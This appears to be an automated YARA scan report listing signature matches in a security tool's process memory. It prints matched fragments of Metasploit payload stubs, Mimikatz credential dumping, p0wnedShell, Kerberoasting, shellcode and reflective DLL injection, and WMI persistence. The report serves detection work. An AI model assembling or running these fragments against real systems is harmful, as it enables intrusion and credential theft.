- 0x2c2679:$s2: .Length,MEM_COMMIT, PAGE_EXECUTE_READWRITE);
- 0x2bfaaf:$s3: [System.Runtime.InteropServices.DllImport("kernel32")]
- 0x2bfaf2:$s4: private static IntPtr PAGE_EXECUTE_READWRITE=(IntPtr)0x40;
- 0x2bfb39:$s5: private static extern IntPtr VirtualAlloc(IntPtr lpStartAddr,UIntPtr size,Int32 flAllocationType,IntPtr flProtect);
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | Msfpayloads_msf_exe_2 | Metasploit Payloads - file msf-exe.aspx | Florian Roth | - 0x2bfd4d:$x1: = new System.Diagnostics.Process();
- 0x2bfd7d:$x2: .StartInfo.UseShellExecute = true;
- 0x2bfdac:$x3: , "svchost.exe");
- 0x2c28db:$x3: , "svchost.exe");
- 0x2bfdca:$s4: = Path.GetTempPath();
- 0x2c28ef:$s4: = Path.GetTempPath();
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | Msfpayloads_msf_6 | Metasploit Payloads - file msf.vbs | Florian Roth | - 0x2c019d:$s1: = CreateObject("Wscript.Shell")
- 0x2c377e:$s1: = CreateObject("Wscript.Shell")
- 0x2caf62:$s1: = CreateObject("Wscript.Shell")
- 0x2c01c9:$s2: = CreateObject("Scripting.FileSystemObject")
- 0x2c3745:$s2: = CreateObject("Scripting.FileSystemObject")
- 0x2c0202:$s3: .GetSpecialFolder(2)
- 0x2c2bbb:$s3: .GetSpecialFolder(2)
- 0x2c0223:$s4: .Write Chr(CLng("
- 0x2c2bd2:$s4: .Write Chr(CLng("
- 0x2c0241:$s5: = "4d5a90000300000004000000ffff00
- 0x2c2be6:$s5: = "4d5a90000300000004000000ffff00
- 0x2c026f:$s6: For i = 1 to Len(
- 0x2c2c0a:$s6: For i = 1 to Len(
- 0x2c028d:$s7: ) Step 2
- 0x2c2c1e:$s7: ) Step 2
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | Msfpayloads_msf_7 | Metasploit Payloads - file msf.vba | Florian Roth | - 0x2c042d:$s1: Private Declare PtrSafe Function CreateThread Lib "kernel32" (ByVal
- 0x2c2d1c:$s1: Private Declare PtrSafe Function CreateThread Lib "kernel32" (ByVal
- 0x2c047d:$s2: = VirtualAlloc(0, UBound(Tsw), &H1000, &H40)
- 0x2c04b6:$s3: = RtlMoveMemory(
- 0x2c2d91:$s3: = RtlMoveMemory(
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | Msfpayloads_msf_8 | Metasploit Payloads - file msf.ps1 | Florian Roth | - 0x2bf61c:$s1: [DllImport("kernel32.dll")]
- 0x2c065e:$s1: [DllImport("kernel32.dll")]
- 0x2c0686:$s2: [DllImport("msvcrt.dll")]
- 0x2c06ac:$s3: -Name "Win32" -namespace Win32Functions -passthru
- 0x2c06ea:$s4: ::VirtualAlloc(0,[Math]::Max($
- 0x2c2f05:$s4: ::VirtualAlloc(0,[Math]::Max($
- 0x2c0715:$s5: .Length,0x1000),0x3000,0x40)
- 0x2c2f26:$s5: .Length,0x1000),0x3000,0x40)
- 0x2c073e:$s6: public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
- 0x2c07ba:$s7: ::memset([IntPtr]($
- 0x2c2fb7:$s7: ::memset([IntPtr]($
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | Msfpayloads_msf_cmd | Metasploit Payloads - file msf-cmd.ps1 | Florian Roth | - 0x2c096b:$x1: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -e
- 0x2c30c6:$x1: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -e
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | Msfpayloads_msf_9 | Metasploit Payloads - file msf.war - contents | Florian Roth | - 0x2c0afc:$s1: if (System.getProperty("os.name").toLowerCase().indexOf("windows") != -1)
- 0x2c0b52:$s2: .concat(".exe");
- 0x2c0b6f:$s3: [0] = "chmod";
- 0x2c322e:$s3: [0] = "chmod";
- 0x2c0b8a:$s4: = Runtime.getRuntime().exec(
- 0x2c323f:$s4: = Runtime.getRuntime().exec(
- 0x2db7dd:$s4: = Runtime.getRuntime().exec(
- 0x2e1384:$s4: = Runtime.getRuntime().exec(
- 0x2fd33f:$s4: = Runtime.getRuntime().exec(
- 0x320efb:$s4: = Runtime.getRuntime().exec(
- 0x33ee51:$s4: = Runtime.getRuntime().exec(
- 0x342c5f:$s4: = Runtime.getRuntime().exec(
- 0x356650:$s4: = Runtime.getRuntime().exec(
- 0x36ff60:$s4: = Runtime.getRuntime().exec(
- 0x2c0bb3:$s5: , 16) & 0xff;
- 0x2c325e:$s5: , 16) & 0xff;
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | Msfpayloads_msf_11 | Metasploit Payloads - file msf.hta | Florian Roth | - 0x2c36f1:$s1: .ExpandEnvironmentStrings("%PSModulePath%") + "..\powershell.exe") Then
- 0x2c01c9:$s2: = CreateObject("Scripting.FileSystemObject")
- 0x2c3745:$s2: = CreateObject("Scripting.FileSystemObject")
- 0x2c377e:$s3: = CreateObject("Wscript.Shell")
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | Msfpayloads_msf_ref | Metasploit Payloads - file msf-ref.ps1 | Florian Roth | - 0x2c393c:$s1: kernel32.dll WaitForSingleObject),
- 0x32e2dc:$s1: kernel32.dll WaitForSingleObject),
- 0x2c396b:$s2: = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')
- 0x32e301:$s2: = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')
- 0x2c39ea:$s3: GetMethod('GetProcAddress').Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object
- 0x32e376:$s3: GetMethod('GetProcAddress').Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object
- 0x2c3a58:$s4: .DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual',
- 0x32e3da:$s4: .DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual',
- 0x2bf85a:$s5: = [System.Convert]::FromBase64String(
- 0x2c2512:$s5: = [System.Convert]::FromBase64String(
- 0x2c3aa3:$s5: = [System.Convert]::FromBase64String(
- 0x32e41b:$s5: = [System.Convert]::FromBase64String(
- 0x2c3ad5:$s6: [Parameter(Position = 0, Mandatory = $True)] [Type[]]
- 0x2c3b17:$s7: DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard,
- 0x32e47b:$s7: DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard,
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | HKTL_Meterpreter_inMemory | Detects Meterpreter in-memory | netbiosX, Florian Roth | - 0x2c3f4c:$xx2: metsrv.x64.dll
- 0x34a39:$xs1: WS2_32.dll
- 0x8cc6e:$xs1: WS2_32.dll
- 0xb6cec:$xs1: WS2_32.dll
- 0x10ef21:$xs1: WS2_32.dll
- 0x114010:$xs1: WS2_32.dll
- 0x2c3f67:$xs1: WS2_32.dll
- 0x394c76:$xs1: WS2_32.dll
- 0x2a26ee:$xs2: ReflectiveLoader
- 0x2b9c46:$xs2: ReflectiveLoader
- 0x2b9d4d:$xs2: ReflectiveLoader
- 0x2b9d8b:$xs2: ReflectiveLoader
- 0x2bafc5:$xs2: ReflectiveLoader
- 0x2bafed:$xs2: ReflectiveLoader
- 0x2bb046:$xs2: ReflectiveLoader
- 0x2bb07a:$xs2: ReflectiveLoader
- 0x2bb0a4:$xs2: ReflectiveLoader
- 0x2bb2c3:$xs2: ReflectiveLoader
- 0x2bb342:$xs2: ReflectiveLoader
- 0x2bb4a2:$xs2: ReflectiveLoader
- 0x2bb4ff:$xs2: ReflectiveLoader
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | Base64_PS1_Shellcode | Detects Base64 encoded PS1 Shellcode | Nick Carr, David Ledbetter | - 0x2cf3df:$substring: AAAAYInlM
- 0x2cf40f:$substring: AAAAYInlM
- 0x2cf43f:$substring: AAAAYInlM
- 0x336abc:$substring: AAAAYInlM
- 0x336ad2:$substring: AAAAYInlM
- 0x336ae8:$substring: AAAAYInlM
- 0x2cf40b:$pattern1: /OiCAAAAYInlM
- 0x336ace:$pattern1: /OiCAAAAYInlM
- 0x2cf43b:$pattern2: /OiJAAAAYInlM
- 0x336ae4:$pattern2: /OiJAAAAYInlM
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | PowerShell_ISESteroids_Obfuscation | Detects PowerShell ISESteroids obfuscation | Florian Roth | - 0x2c8fcb:$x1: /\/===\__
- 0x332268:$x1: /\/===\__
- 0x2c8fe1:$x2: ${__/\/==
- 0x332274:$x2: ${__/\/==
- 0x2c8ff7:$x3: Catch { }
- 0x2c900d:$x4: \_/=} ${_
- 0x33228c:$x4: \_/=} ${_
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | SUSP_OBFUSC_PowerShell_True_Jun20_1 | Detects indicators often found in obfuscated PowerShell scripts | Florian Roth | - 0x2c93ae:$: ${t`rue}
- 0x3324d0:$: ${t`rue}
- 0x2c93c3:$: ${tr`ue}
- 0x3324d9:$: ${tr`ue}
- 0x2c93d8:$: ${tru`e}
- 0x3324e2:$: ${tru`e}
- 0x2c93ed:$: ${t`ru`e}
- 0x3324eb:$: ${t`ru`e}
- 0x2c9403:$: ${tr`u`e}
- 0x3324f5:$: ${tr`u`e}
- 0x2c9419:$: ${t`r`ue}
- 0x3324ff:$: ${t`r`ue}
- 0x2c942f:$: ${t`r`u`e}
- 0x332509:$: ${t`r`u`e}
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | Payload_Exe2Hex | Detects payload generated by exe2hex | Florian Roth | - 0x167479:$a1: set /p "=4d5a
- 0x1743a0:$a1: set /p "=4d5a
- 0x2d4652:$a1: set /p "=4d5a
- 0x33a088:$a1: set /p "=4d5a
- 0x167493:$a2: powershell -Command "$hex=
- 0x1743b0:$a2: powershell -Command "$hex=
- 0x2d466c:$a2: powershell -Command "$hex=
- 0x33a098:$a2: powershell -Command "$hex=
- 0x1674ba:$b1: set+%2Fp+%22%3D4d5
- 0x1743cd:$b1: set+%2Fp+%22%3D4d5
- 0x2d4693:$b1: set+%2Fp+%22%3D4d5
- 0x33a0b5:$b1: set+%2Fp+%22%3D4d5
- 0x1674d9:$b2: powershell+-Command+%22%24hex
- 0x1743e2:$b2: powershell+-Command+%22%24hex
- 0x2d46b2:$b2: powershell+-Command+%22%24hex
- 0x33a0ca:$b2: powershell+-Command+%22%24hex
- 0x167503:$c1: echo 4d 5a
- 0x174402:$c1: echo 4d 5a
- 0x2d46dc:$c1: echo 4d 5a
- 0x33a0ea:$c1: echo 4d 5a
- 0x16751b:$c2: echo r cx >>
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | Reflective_DLL_Loader_Aug17_1 | Detects Reflective DLL Loader | Florian Roth | - 0x2bb25d:$x1: \Release\reflective_dll.pdb
- 0x2bb45a:$x1: \Release\reflective_dll.pdb
- 0x2bb285:$x2: reflective_dll.x64.dll
- 0x2bb2a8:$s3: DLL Injection
- 0x2bb2c2:$s4: ?ReflectiveLoader@@YA_KPEAX@Z
- 0x2bb4fe:$s4: ?ReflectiveLoader@@YA_KPEAX@Z
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | Reflective_DLL_Loader_Aug17_2 | Detects Reflective DLL Loader - suspicious - Possible FP could be program crack | Florian Roth | - 0x2bba0f:$x1: \ReflectiveDLLInjection-master\
- 0x2bbe79:$x1: \ReflectiveDLLInjection-master\
- 0x2bba3b:$s2: reflective_dll.dll
- 0x2bc143:$s2: reflective_dll.dll
- 0x2bc194:$s2: reflective_dll.dll
- 0x154598:$s3: DLL injection
- 0x154853:$s3: DLL injection
- 0x2ab965:$s3: DLL injection
- 0x2bba5a:$s3: DLL injection
- 0x31fb22:$s3: DLL injection
- 0x36f1f0:$s3: DLL injection
- 0x2bb045:$s4: _ReflectiveLoader@4
- 0x2bba74:$s4: _ReflectiveLoader@4
- 0x2bbf2e:$s4: _ReflectiveLoader@4
- 0x2bba94:$s5: Reflective Dll Injection
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | Reflective_DLL_Loader_Aug17_3 | Detects Reflective DLL Loader | Florian Roth | - 0x2bc0e0:$s1: \Release\inject.pdb
- 0x2bc100:$s2: !!! Failed to gather information on system processes!
- 0x2bba3b:$s3: reflective_dll.dll
- 0x2bc143:$s3: reflective_dll.dll
- 0x2bc194:$s3: reflective_dll.dll
- 0x2bc162:$s4: [-] %s. Error=%d
- 0x2bc17f:$s5: \Start Menu\Programs\reflective_dll.dll
- 0x2bcdcc:$s5: \Start Menu\Programs\reflective_dll.dll
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | GetUserSPNs_VBS | Auto-generated rule - file GetUserSPNs.vbs | Florian Roth | - 0x2b9568:$s1: Wscript.Echo "User Logon: " & oRecordset.Fields("samAccountName")
- 0x2b95b6:$s2: Wscript.Echo " USAGE: " & WScript.ScriptName & " SpnToFind [GC Servername or Forestname]"
- 0x2b9623:$s3: strADOQuery = "<" + strGCPath + ">;(&(!objectClass=computer)(servicePrincipalName=*));" & _
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | GetUserSPNs_PS1 | Auto-generated rule - file GetUserSPNs.ps1 | Florian Roth | - 0x2b9832:$s1: $ForestInfo = [System.DirectoryServices.ActiveDirectory.Forest]::GetCurrentForest()
- 0x2b9892:$s2: @{Name="PasswordLastSet"; Expression={[datetime]::fromFileTime($result.Properties["pwdlastset"][0])} } #, `
- 0x2b990f:$s3: Write-Host "No Global Catalogs Found!"
- 0x2b9942:$s4: $searcher.PropertiesToLoad.Add("pwdlastset") | Out-Null
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | kerberoast_PY | Auto-generated rule - file kerberoast.py | Florian Roth | - 0x2b9b29:$s1: newencserverticket = kerberos.encrypt(key, 2, encoder.encode(decserverticket), nonce)
- 0x2b9b8b:$s2: key = kerberos.ntlmhash(args.password)
- 0x2b9bbe:$s3: help='the password used to decrypt/encrypt the ticket')
- 0x2b9c02:$s4: newencserverticket = kerberos.encrypt(key, 2, e, nonce)
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | p0wnedPowerCat | p0wnedShell Runspace Post Exploitation Toolkit - file p0wnedPowerCat.cs | Florian Roth | - 0x2c4e6c:$x1: Now if we point Firefox to http://127.0.0.1
- 0x2c4ea4:$x2: powercat -l -v -p
- 0x2c4ec2:$x3: P0wnedListener
- 0x2c5419:$x3: P0wnedListener
- 0x2c4edd:$x4: EncodedPayload.bat
- 0x2c4efc:$x5: powercat -c
- 0x2c4f15:$x6: Program.P0wnedPath()
- 0x2c6375:$x6: Program.P0wnedPath()
- 0x32f29c:$x6: Program.P0wnedPath()
- 0x33015a:$x6: Program.P0wnedPath()
- 0x2c4f36:$x7: Invoke-PowerShellTcpOneLine
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | Hacktool_Strings_p0wnedShell | p0wnedShell Runspace Post Exploitation Toolkit - file p0wnedShell.cs | Florian Roth | - 0x2c512b:$x1: Invoke-TokenManipulation
- 0x2c5920:$x1: Invoke-TokenManipulation
- 0x2c5150:$x2: windows/meterpreter
- 0x2c59e4:$x2: windows/meterpreter
- 0x2c7b58:$x2: windows/meterpreter
- 0x32fa2f:$x2: windows/meterpreter
- 0x331304:$x2: windows/meterpreter
- 0x2c5170:$x3: lsadump::dcsync
- 0x2c518c:$x4: p0wnedShellx86
- 0x2c51a7:$x5: p0wnedShellx64
- 0x2c56d0:$x5: p0wnedShellx64
- 0x2c5739:$x5: p0wnedShellx64
- 0x32f827:$x5: p0wnedShellx64
- 0x2c51c2:$x6: Invoke_PsExec()
- 0x2a875b:$x7: Invoke-Mimikatz
- 0x2ac7c5:$x7: Invoke-Mimikatz
- 0x2ae09c:$x7: Invoke-Mimikatz
- 0x2b0e16:$x7: Invoke-Mimikatz
- 0x2b55e4:$x7: Invoke-Mimikatz
- 0x2b56cb:$x7: Invoke-Mimikatz
- 0x2b8170:$x7: Invoke-Mimikatz
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | p0wnedPotato | p0wnedShell Runspace Post Exploitation Toolkit - file p0wnedPotato.cs | Florian Roth | - 0x2c5400:$x1: Invoke-Tater
- 0x2c5419:$x2: P0wnedListener.Execute(WPAD_Proxy);
- 0x2c5449:$x3: -SpooferIP
- 0x32f61e:$x3: -SpooferIP
- 0x2c5462:$x4: TaterCommand()
- 0x32f62d:$x4: TaterCommand()
- 0x2c547d:$x5: FileName = "cmd.exe",
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | p0wnedExploits | p0wnedShell Runspace Post Exploitation Toolkit - file p0wnedExploits.cs | Florian Roth | - 0x2c5661:$x1: Pshell.RunPSCommand(Whoami);
- 0x2c568a:$x2: If succeeded this exploit should popup a System CMD Shell
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | p0wnedBinaries | p0wnedShell Runspace Post Exploitation Toolkit - file p0wnedBinaries.cs | Florian Roth | - 0x2c5893:$x1: Oq02AB+LCAAAAAAABADs/QkW3LiOLQBuRUsQR1H731gHMQOkFGFnvvrdp/O4sp6tkDiAIIjhAryu4z6PVOtxHuXz3/xT6X9za/Df/Hsa/JT/9
- 0x2c5ebf:$x1: Oq02AB+LCAAAAAAABADs/QkW3LiOLQBuRUsQR1H731gHMQOkFGFnvvrdp/O4sp6tkDiAIIjhAryu4z6PVOtxHuXz3/xT6X9za/Df/Hsa/JT/9
- 0x32f906:$x1: Oq02AB+LCAAAAAAABADs/QkW3LiOLQBuRUsQR1H731gHMQOkFGFnvvrdp/O4sp6tkDiAIIjhAryu4z6PVOtxHuXz3/xT6X9za/Df/Hsa/JT/9
- 0x32fd82:$x1: Oq02AB+LCAAAAAAABADs/QkW3LiOLQBuRUsQR1H731gHMQOkFGFnvvrdp/O4sp6tkDiAIIjhAryu4z6PVOtxHuXz3/xT6X9za/Df/Hsa/JT/9
- 0x2c5f39:$x2: wpoWAB+LCAAAAAAABADs/QeyK7uOBYhORUNIenL+E2vBA0ympH3erY4f8Tte3TpbUiY9YRbcGK91vVKtr+tV3v/B/yr/m1vD/+DvNOVb+V/f
- 0x32fdf2:$x2: wpoWAB+LCAAAAAAABADs/QeyK7uOBYhORUNIenL+E2vBA0ympH3erY4f8Tte3TpbUiY9YRbcGK91vVKtr+tV3v/B/yr/m1vD/+DvNOVb+V/f
- 0x2c5fb2:$x3: mo0MAB+LCAAAAAAABADsXQl24zqu3YqXII6i9r+xJ4AACU4SZcuJnVenf/9OxbHEAcRwcQGu62NbHsrax/Iw+3/hP5b+VzuH/4WfVeDf8n98
- 0x32fe61:$x3: mo0MAB+LCAAAAAAABADsXQl24zqu3YqXII6i9r+xJ4AACU4SZcuJnVenf/9OxbHEAcRwcQGu62NbHsrax/Iw+3/hP5b+VzuH/4WfVeDf8n98
- 0x2c602b:$x4: LE4CAB+LCAAAAAAABADsfQmW2zqu6Fa8BM7D/jf2hRmkKNuVm/Tt9zunkipb4giCIGb2/prhFUt5hVe+/sNP4b+pVvwPn+OQp/LT9ge/+
- 0x32fed0:$x4: LE4CAB+LCAAAAAAABADsfQmW2zqu6Fa8BM7D/jf2hRmkKNuVm/Tt9zunkipb4giCIGb2/prhFUt5hVe+/sNP4b+pVvwPn+OQp/LT9ge/+
- 0x2c60a1:$x5: XpMCAB+LCAAAAAAABADsfQeWIzmO6FV0hKAn73+xL3iAwVAqq2t35r/tl53VyhCDFoQ3Y7zW9Uq1vq5Xef/CT+X/59bwFz6nKU/lp+8P/
- 0x32ff3c:$x5: XpMCAB+LCAAAAAAABADsfQeWIzmO6FV0hKAn73+xL3iAwVAqq2t35r/tl53VyhCDFoQ3Y7zW9Uq1vq5Xef/CT+X/59bwFz6nKU/lp+8P/
- 0x2c6117:$x6: STwAAB+LCAAAAAAABADtWwmy6yoO3YqXgJjZ/8ZaRwNgx/HNfX/o7qqUkxgzCM0SmLR2jHBQzkc4En9xZbvHUuSLMnWv9ateK/70ilStR
- 0x32ffa8:$x6: STwAAB+LCAAAAAAABADtWwmy6yoO3YqXgJjZ/8ZaRwNgx/HNfX/o7qqUkxgzCM0SmLR2jHBQzkc4En9xZbvHUuSLMnWv9ateK/70ilStR
- 0x2c618d:$x7: namespace p0wnedShell
- 0x2c6396:$x7: namespace p0wnedShell
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | p0wnedAmsiBypass | p0wnedShell Runspace Post Exploitation Toolkit - file p0wnedAmsiBypass.cs | Florian Roth | - 0x2c4f15:$x1: Program.P0wnedPath()
- 0x2c6375:$x1: Program.P0wnedPath()
- 0x2c618d:$x2: namespace p0wnedShell
- 0x2c6396:$x2: namespace p0wnedShell
- 0x2c63b8:$x3: H4sIAAAAAAAEAO1YfXRUx3WflXalFazQgiVb5nMVryzxIbGrt/rcFRZIa1CQYEFCQnxotUhP2pX3Q337HpYotCKrPdbmoQQnkOY0+BQCNKRpe
- 0x330189:$x3: H4sIAAAAAAAEAO1YfXRUx3WflXalFazQgiVb5nMVryzxIbGrt/rcFRZIa1CQYEFCQnxotUhP2pX3Q337HpYotCKrPdbmoQQnkOY0+BQCNKRpe
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | p0wnedShell_outputs | p0wnedShell Runspace Post Exploitation Toolkit - from files p0wnedShell.cs, p0wnedShell.cs | Florian Roth | - 0x2c6623:$s1: [+] For this attack to succeed, you need to have Admin privileges.
- 0x2c6672:$s2: [+] This is not a valid hostname, please try again
- 0x2c66b1:$s3: [+] First return the name of our current domain.
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | ps1_toolkit_PowerUp | Auto-generated rule - file PowerUp.ps1 | Florian Roth | - 0x2cc1b1:$s1: iex "$Env:SystemRoot\System32\inetsrv\appcmd.exe list vdir /text:vdir.name" | % {
- 0x2cc210:$s2: iex "$Env:SystemRoot\System32\inetsrv\appcmd.exe list apppools /text:name" | % {
- 0x2cc26e:$s3: if ($Env:PROCESSOR_ARCHITECTURE -eq $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QQBNAEQANgA0AA==')))) {
- 0x2cc2f8:$s4: C:\Windows\System32\InetSRV\appcmd.exe list vdir /text:physicalpath |
- 0x2cc34b:$s5: if (Test-Path ("$Env:SystemRoot\System32\inetsrv\appcmd.exe"))
- 0x2cc397:$s6: if (Test-Path ("$Env:SystemRoot\System32\InetSRV\appcmd.exe")) {
- 0x2cc3e5:$s7: Write-Verbose "Executing command '$Cmd'"
- 0x2cc41a:$s8: Write-Warning "[!] Target service
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | ps1_toolkit_Inveigh_BruteForce | Auto-generated rule - file Inveigh-BruteForce.ps1 | Florian Roth | - 0x2cc614:$s1: Import-Module .\Inveigh.psd1;Invoke-InveighBruteForce -SpooferTarget 192.168.1.11
- 0x2cc673:$s2: $(Get-Date -format 's') - Attempting to stop HTTP listener")|Out-Null
- 0x2cc6c5:$s3: Invoke-InveighBruteForce -SpooferTarget 192.168.1.11 -Hostname server1
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | ps1_toolkit_Invoke_Shellcode | Auto-generated rule - file Invoke-Shellcode.ps1 | Florian Roth | - 0x2c6f54:$s1: Get-ProcAddress kernel32.dll WriteProcessMemory
- 0x2cc8e0:$s1: Get-ProcAddress kernel32.dll WriteProcessMemory
- 0x2ccbdb:$s1: Get-ProcAddress kernel32.dll WriteProcessMemory
- 0x3309d2:$s1: Get-ProcAddress kernel32.dll WriteProcessMemory
- 0x2cc91c:$s2: Get-ProcAddress kernel32.dll OpenProcess
- 0x2cc951:$s3: msfpayload windows/exec CMD="cmd /k calc" EXITFUNC=thread C | sed '1,6d;s/[";]//g;s/\\/,0/g' | tr -d '\n' | cut -c2-
- 0x2cc9d3:$s4: inject shellcode into
- 0x334b94:$s4: inject shellcode into
- 0x2c7bb0:$s5: Injecting shellcode
- 0x2cc9f5:$s5: Injecting shellcode
- 0x331352:$s5: Injecting shellcode
- 0x334bac:$s5: Injecting shellcode
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | ps1_toolkit_Invoke_Mimikatz | Auto-generated rule - file Invoke-Mimikatz.ps1 | Florian Roth | - 0x2c6f54:$s1: Get-ProcAddress kernel32.dll WriteProcessMemory
- 0x2cc8e0:$s1: Get-ProcAddress kernel32.dll WriteProcessMemory
- 0x2ccbdb:$s1: Get-ProcAddress kernel32.dll WriteProcessMemory
- 0x3309d2:$s1: Get-ProcAddress kernel32.dll WriteProcessMemory
- 0x2ccc17:$s2: ps | where { $_.Name -eq $ProcName } | select ProcessName, Id, SessionId
- 0x2ccc6c:$s3: privilege::debug exit
- 0x334d60:$s3: privilege::debug exit
- 0x2ccc8e:$s4: Get-ProcAddress Advapi32.dll AdjustTokenPrivileges
- 0x2cd113:$s4: Get-ProcAddress Advapi32.dll AdjustTokenPrivileges
- 0x2ccccd:$s5: Invoke-Mimikatz -DumpCreds
- 0x2cccf4:$s6: | Add-Member -MemberType NoteProperty -Name IMAGE_FILE_EXECUTABLE_IMAGE -Value 0x0002
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | ps1_toolkit_Invoke_RelfectivePEInjection | Auto-generated rule - file Invoke-RelfectivePEInjection.ps1 | Florian Roth | - 0x2ccf36:$x1: Invoke-ReflectivePEInjection -PEBytes $PEBytes -FuncReturnType WString -ComputerName (Get-Content targetlist.txt)
- 0x2ccfb4:$x2: Invoke-ReflectivePEInjection -PEBytes $PEBytes -FuncReturnType WString -ComputerName Target.local
- 0x2cd022:$x3: } = Get-ProcAddress Advapi32.dll OpenThreadToken
- 0x335035:$x3: } = Get-ProcAddress Advapi32.dll OpenThreadToken
- 0x2cd05f:$x4: Invoke-ReflectivePEInjection -PEBytes $PEBytes -ProcName lsass -ComputerName Target.Local
- 0x2cd0c5:$s5: $PEBytes = [IO.File]::ReadAllBytes('DemoDLL_RemoteProcess.dll')
- 0x2cd111:$s6: = Get-ProcAddress Advapi32.dll AdjustTokenPrivileges
- 0x335106:$s6: = Get-ProcAddress Advapi32.dll AdjustTokenPrivileges
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | ps1_toolkit_Persistence | Auto-generated rule - file Persistence.ps1 | Florian Roth | - 0x2cd310:$s1: "`"```$Filter=Set-WmiInstance -Class __EventFilter -Namespace ```"root\subscription```
- 0x335256:$s1: "`"```$Filter=Set-WmiInstance -Class __EventFilter -Namespace ```"root\subscription```
- 0x2cd373:$s2: }=$PROFILE.AllUsersAllHosts;${
- 0x3352af:$s2: }=$PROFILE.AllUsersAllHosts;${
- 0x2cd39e:$s3: C:\PS> $ElevatedOptions = New-ElevatedPersistenceOption -Registry -AtStartup
- 0x3352d0:$s3: C:\PS> $ElevatedOptions = New-ElevatedPersistenceOption -Registry -AtStartup
- 0x2cd3f7:$s4: = gwmi Win32_OperatingSystem | select -ExpandProperty OSArchitecture
- 0x33531f:$s4: = gwmi Win32_OperatingSystem | select -ExpandProperty OSArchitecture
- 0x2cd448:$s5: -eq $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('MAAxADQAQwA='))))
- 0x335366:$s5: -eq $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('MAAxADQAQwA='))))
- 0x2cd4ac:$s6: }=$PROFILE.CurrentUserAllHosts;${
- 0x3353c0:$s6: }=$PROFILE.CurrentUserAllHosts;${
- 0x2cd4da:$s7: FromBase64String('UwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBPAG4ASQBkAGwAZQA=')
- 0x2ce30c:$s7: FromBase64String('UwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBPAG4ASQBkAGwAZQA=')
- 0x3353e4:$s7: FromBase64String('UwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBPAG4ASQBkAGwAZQA=')
- 0x335e77:$s7: FromBase64String('UwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBPAG4ASQBkAGwAZQA=')
- 0x2cd52f:$s8: [System.Text.AsciiEncoding]::ASCII.GetString($MZHeader)
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | ps1_toolkit_Invoke_Mimikatz_RelfectivePEInjection | Auto-generated rule - from files Invoke-Mimikatz.ps1, Invoke-RelfectivePEInjection.ps1 | Florian Roth | - 0x2cd7ed:$s1: [IntPtr]$DllAddress = [System.Runtime.InteropServices.Marshal]::PtrToStructure($ReturnValMem, [Type][IntPtr])
- 0x2cd867:$s2: if ($GetCommandLineAAddr -eq [IntPtr]::Zero -or $GetCommandLineWAddr -eq [IntPtr]::Zero)
- 0x2cd8cc:$s3: [Byte[]]$Shellcode2 = @(0xc6, 0x03, 0x01, 0x48, 0x83, 0xec, 0x20, 0x66, 0x83, 0xe4, 0xc0, 0x48, 0xbb)
- 0x2cd93e:$s4: Function Import-DllInRemoteProcess
- 0x2cd96d:$s5: FromBase64String('QwBvAG4AdABpAG4AdQBlAA==')))
- 0x2cd9a8:$s6: [Byte[]]$Shellcode2 = @(0xc6, 0x03, 0x01, 0x83, 0xec, 0x20, 0x83, 0xe4, 0xc0, 0xbb)
- 0x2cda08:$s7: [System.Runtime.InteropServices.Marshal]::FreeHGlobal($TokenPrivilegesMem)
- 0x2cda5f:$s8: [System.Runtime.InteropServices.Marshal]::StructureToPtr($CurrAddr, $FinalAddr, $false) | Out-Null
